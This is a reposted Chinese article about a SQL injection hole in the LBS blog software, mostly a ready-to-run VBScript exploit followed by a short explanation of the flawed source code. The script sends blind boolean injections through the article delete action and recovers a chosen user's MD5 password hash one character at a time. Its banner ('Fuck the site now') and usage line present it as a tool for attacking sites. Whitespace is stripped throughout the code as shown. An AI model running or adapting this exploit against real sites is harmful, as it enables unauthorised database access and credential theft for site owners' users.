LBS blog sql注射漏洞[All version]-官方已有补丁
LBS blog sql注射漏洞[All version]-官方已有补丁
发布时间:2016-12-30 来源:查字典编辑
摘要:呵呵,只是证明下漏洞存在exp如下,保存为vbs,自己下个程序测试自己吧'From剑心'==========================...

呵呵,只是证明下漏洞存在

exp如下,保存为vbs,自己下个程序测试自己吧

'From剑心

'============================================================================

'使用说明:

'在命令提示符下:

'cscript.exelbsblog.vbs要攻击的网站的博客路径有效的文章id要破解的博客用户密码

'如:

'cscript.exelbsblog.vbswww.xxxx.com/blog/11

'byloveshell

'============================================================================

OnErrorResumeNext

DimoArgs

DimolbsXML'XMLHTTP对象用来打开目标网址

DimTargetURL'目标网址

Dimuserid,articleid'博客用户名

DimTempStr'存放已获取的部分MD5密码

DimCharHex'定义16进制字符

Dimcharset

SetoArgs=WScript.arguments

IfoArgs.count<1ThenCallShowUsage()

SetolbsXML=createObject("Microsoft.XMLHTTP")

'补充完整目标网址

TargetURL=oArgs(0)

IfLCase(Left(TargetURL,7))<>"http://"ThenTargetURL="http://"&TargetURL

Ifright(TargetURL,1)<>"/"ThenTargetURL=TargetURL&"/"

TargetURL=TargetURL&"article.asp"

articleid=oArgs(1)

userid=oArgs(2)

TempStr=""

CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")

WScript.echo"LBSblogAllversionExploit"&vbcrlf

WScript.echo"By剑心"&vbcrlf

WScript.echo"http://www.loveshell.net/JustForfun:)"&vbcrlf&vbcrlf

WScript.echo"+Fuckthesitenow"&vbcrlf

Callmain(TargetURL,BlogName)

SetoBokeXML=Nothing

'----------------------------------------------sub-------------------------------------------------------

'============================================

'函数名称:main

'函数功能:主程序,注入获得blog用户密码

'============================================

Submain(TargetURL,BlogName)

DimMainOffset,SubOffset,TempLen,OpenURL,GetPage

ForMainOffset=1To40

ForSubOffset=0To15

TempLen=0

postdata=""

postdata=articleid&"and(selectleft(user_password,"&MainOffset&")fromblog_userwhereuser_id="&userid&")='"&TempStr&CharHex(SubOffset)&"'"

OpenURL=TargetURL

olbsXML.open"Post",OpenURL,False,"",""

olbsXML.setRequestHeader"Content-Type","application/x-www-form-urlencoded"

olbsXML.send"act=delete&id="&escape(postdata)

GetPage=BytesToBstr(olbsXML.ResponseBody)

'判断访问的页面是否存在

IfInStr(GetPage,"deleted")<>0Then

'"博客用户不存在或填写的资料有误"为错误标志,返回此标志说明猜解的MD5不正确

'如果得到0000000000000000的MD5值,请修改错误标志

ElseIfInStr(GetPage,"permission")<>0Then

TempStr=TempStr&CharHex(SubOffset)

WScript.Echo"+Cracknow:"&TempStr

Exitfor

Else

WScript.echovbcrlf&"Somethingerror"&vbcrlf

WScript.echovbcrlf&GetPage&vbcrlf

WScript.Quit

EndIf

next

Next

WScript.Echovbcrlf&"+WeGotIt:"&TempStr&vbcrlf&vbcrlf&":PDon'tBeevil"

Endsub

'============================================

'函数名称:BytesToBstr

'函数功能:将XMLHTTP对象中的内容转化为GB2312编码

'============================================

FunctionBytesToBstr(body)

dimobjstream

setobjstream=createObject("ADODB.Stream")

objstream.Type=1

objstream.Mode=3

objstream.Open

objstream.Writebody

objstream.Position=0

objstream.Type=2

objstream.Charset="GB2312"

BytesToBstr=objstream.ReadText

objstream.Close

setobjstream=nothing

EndFunction

'============================

'函数名称:ShowUsage

'函数功能:使用方法提示

'============================

SubShowUsage()

WScript.echo"LBSblogExploit"&vbcrlf&"ByLoveshell/剑心"

WScript.echo"Usage:"&vbcrlf&"CScript"&WScript.ScriptFullName&"TargetURLBlogName"

WScript.echo"Example:"&vbcrlf&"CScript"&WScript.ScriptFullName&"http://www.loveshell.net/11"

WScript.echo""

WScript.Quit

EndSub

漏洞说明:

src_article.asp中的

......

input["log_id"]=func.checkInt(input["log_id"]);

if(!input["id"]){

strError=lang["invalid_parameter"];

}else{

//Checkifthearticleexists

theArticle.load("log_id,log_authorID,log_catID","log_id="+input["id"]);

strError=false;

}

......

过滤的是log_id,但是使用的确实id,呵呵:)

然后呢?

class/article.asp中的代码

this.load=function(strselect,strwhere){

vartmpA=connBlog.query("selectTOP1"+strselect+"FROM[blog_Article]where"+strwhere);

if(tmpA){

this.fill(tmpA[0]);

returntrue;

}else{

returnfalse;

}

}

上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!

functionarticledelete(){

if(theUser.rights["delete"]<1){

//CheckUserRight-withoutDBQuery

pageHeader(lang["error"]);

redirectMessage(lang["error"],lang["no_rights"],lang["goback"],"javascript:window.history.back();",false,"errorbox");

}else{

vartheArticle=newlbsArticle();

varstrError;

默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Javascript教程学习
热门Javascript教程学习
编程开发子分类